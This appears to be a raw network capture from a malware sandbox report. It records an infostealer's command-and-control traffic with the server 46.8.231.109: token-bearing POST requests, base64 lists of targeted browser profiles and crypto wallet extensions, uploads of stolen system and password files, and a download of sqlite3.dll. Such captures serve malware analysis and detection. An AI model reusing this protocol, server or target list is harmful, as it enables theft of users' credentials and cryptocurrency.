44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: ODZkMGUxNmE4ZmVmMGNmZDQwMDY5ZjdlM2QyYjVmNjAwZTFlZTkyNTQ3NTcwOWVmNzQ4OTgzNjVkNzcyNTAzYWIyYWJiNzcyfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Oct 2, 2024 09:41:20.459405899 CEST	467	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKJDGDGDHDGDBFIDHDBA Host: 46.8.231.109 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 36 64 30 65 31 36 61 38 66 65 66 30 63 66 64 34 30 30 36 39 66 37 65 33 64 32 62 35 66 36 30 30 65 31 65 65 39 32 35 34 37 35 37 30 39 65 66 37 34 38 39 38 33 36 35 64 37 37 32 35 30 33 61 62 32 61 62 62 37 37 32 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 2d 2d 0d 0a Data Ascii: ------AKJDGDGDHDGDBFIDHDBAContent-Disposition: form-data; name="token"86d0e16a8fef0cfd40069f7e3d2b5f600e1ee925475709ef74898365d772503ab2abb772------AKJDGDGDHDGDBFIDHDBAContent-Disposition: form-data; name="message"browsers------AKJDGDGDHDGDBFIDHDBA--
Oct 2, 2024 09:41:20.637511969 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:20 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Oct 2, 2024 09:41:20.637535095 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Oct 2, 2024 09:41:20.642350912 CEST	466	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAKKEGCAAECAAAKFBGIE Host: 46.8.231.109 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 4b 45 47 43 41 41 45 43 41 41 41 4b 46 42 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 36 64 30 65 31 36 61 38 66 65 66 30 63 66 64 34 30 30 36 39 66 37 65 33 64 32 62 35 66 36 30 30 65 31 65 65 39 32 35 34 37 35 37 30 39 65 66 37 34 38 39 38 33 36 35 64 37 37 32 35 30 33 61 62 32 61 62 62 37 37 32 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 4b 45 47 43 41 41 45 43 41 41 41 4b 46 42 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 4b 45 47 43 41 41 45 43 41 41 41 4b 46 42 47 49 45 2d 2d 0d 0a Data Ascii: ------BAKKEGCAAECAAAKFBGIEContent-Disposition: form-data; name="token"86d0e16a8fef0cfd40069f7e3d2b5f600e1ee925475709ef74898365d772503ab2abb772------BAKKEGCAAECAAAKFBGIEContent-Disposition: form-data; name="message"plugins------BAKKEGCAAECAAAKFBGIE--
Oct 2, 2024 09:41:20.821237087 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:20 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Oct 2, 2024 09:41:20.821257114 CEST	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Oct 2, 2024 09:41:20.821266890 CEST	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Oct 2, 2024 09:41:20.821276903 CEST	1236	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Oct 2, 2024 09:41:20.821283102 CEST	896	IN	Data Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58 Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
Oct 2, 2024 09:41:20.821293116 CEST	1236	IN	Data Raw: 61 6d 74 68 63 47 5a 69 61 57 68 6b 66 44 46 38 4d 48 77 77 66 46 4e 68 5a 6d 56 51 59 57 78 38 62 47 64 74 63 47 4e 77 5a 32 78 77 62 6d 64 6b 62 32 46 73 59 6d 64 6c 62 32 78 6b 5a 57 46 71 5a 6d 4e 73 62 6d 68 68 5a 6d 46 38 4d 58 77 77 66 44 Data Ascii: amthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnBsZ2JufDF8MHwwfEZsdXZpIFdhbGxldHxtbW1qYmNmb2Zjb25rYW5uam9uZm1qamFqcGxsZGRiZ3wxfDB8MHx
Oct 2, 2024 09:41:20.821304083 CEST	268	IN	Data Raw: 64 48 78 71 61 57 6c 6b 61 57 46 68 62 47 6c 6f 62 57 31 6f 5a 47 52 71 5a 32 4a 75 59 6d 64 6b 5a 6d 5a 73 5a 57 78 76 59 33 42 68 61 33 77 78 66 44 42 38 4d 48 78 55 54 30 34 67 56 32 46 73 62 47 56 30 66 47 35 77 61 48 42 73 63 47 64 76 59 57 Data Ascii: dHxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxUT04gV2FsbGV0fG5waHBscGdvYWtoaGpjaGtraG1pZ2dha2lqbmtoZm5kfDF8MHwwfE15VG9uV2FsbGV0fGZsZGZwZ2lwZm5jZ25kZm9sY2JrZGVla25iYmJuaGNjfDF8MHwwfFVuaXN3YXAgRXh0ZW5zaW9ufG5ucG1mcGxrZm9nZnBtY25ncGxobmJ
Oct 2, 2024 09:41:20.824364901 CEST	467	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJDHCAFCGDAAKEBFIJDG Host: 46.8.231.109 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 36 64 30 65 31 36 61 38 66 65 66 30 63 66 64 34 30 30 36 39 66 37 65 33 64 32 62 35 66 36 30 30 65 31 65 65 39 32 35 34 37 35 37 30 39 65 66 37 34 38 39 38 33 36 35 64 37 37 32 35 30 33 61 62 32 61 62 62 37 37 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 2d 2d 0d 0a Data Ascii: ------KJDHCAFCGDAAKEBFIJDGContent-Disposition: form-data; name="token"86d0e16a8fef0cfd40069f7e3d2b5f600e1ee925475709ef74898365d772503ab2abb772------KJDHCAFCGDAAKEBFIJDGContent-Disposition: form-data; name="message"fplugins------KJDHCAFCGDAAKEBFIJDG--
Oct 2, 2024 09:41:21.002832890 CEST	335	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:20 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Oct 2, 2024 09:41:21.024800062 CEST	200	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKKJKFBKKECFHJKEBKEH Host: 46.8.231.109 Content-Length: 6599 Connection: Keep-Alive Cache-Control: no-cache
Oct 2, 2024 09:41:21.024800062 CEST	6599	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 36 64 30 65 31 Data Ascii: ------BKKJKFBKKECFHJKEBKEHContent-Disposition: form-data; name="token"86d0e16a8fef0cfd40069f7e3d2b5f600e1ee925475709ef74898365d772503ab2abb772------BKKJKFBKKECFHJKEBKEHContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Oct 2, 2024 09:41:21.245502949 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 09:41:21.246103048 CEST	91	OUT	GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Oct 2, 2024 09:41:21.431461096 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:21 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT ETag: "10e436-5e7eeebed8d80" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Oct 2, 2024 09:41:21.431477070 CEST	224	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Oct 2, 2024 09:41:21.431484938 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Oct 2, 2024 09:41:22.637629032 CEST	200	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAKKEGCAAECAAAKFBGIE Host: 46.8.231.109 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Oct 2, 2024 09:41:22.866750002 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 09:41:22.943440914 CEST	200	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHJEBGIEBFIJKEBFBFHI Host: 46.8.231.109 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Oct 2, 2024 09:41:23.269002914 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 09:41:23.283180952 CEST	562	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFB Host: 46.8.231.109 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 36 64 30 65 31 36 61 38 66 65 66 30 63 66 64 34 30 30 36 39 66 37 65 33 64 32 62 35 66 36 30 30 65 31 65 65 39 32 35 34 37 35 37 30 39 65 66 37 34 38 39 38 33 36 35 64 37 37 32 35 30 33 61 62 32 61 62 62 37 37 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="token"86d0e16a8fef0cfd40069f7e3d2b5f600e1ee925475709ef74898365d772503ab2abb772------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="file"------GDHIDHIEGIIIECAKEBFB--
Oct 2, 2024 09:41:23.493695974 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
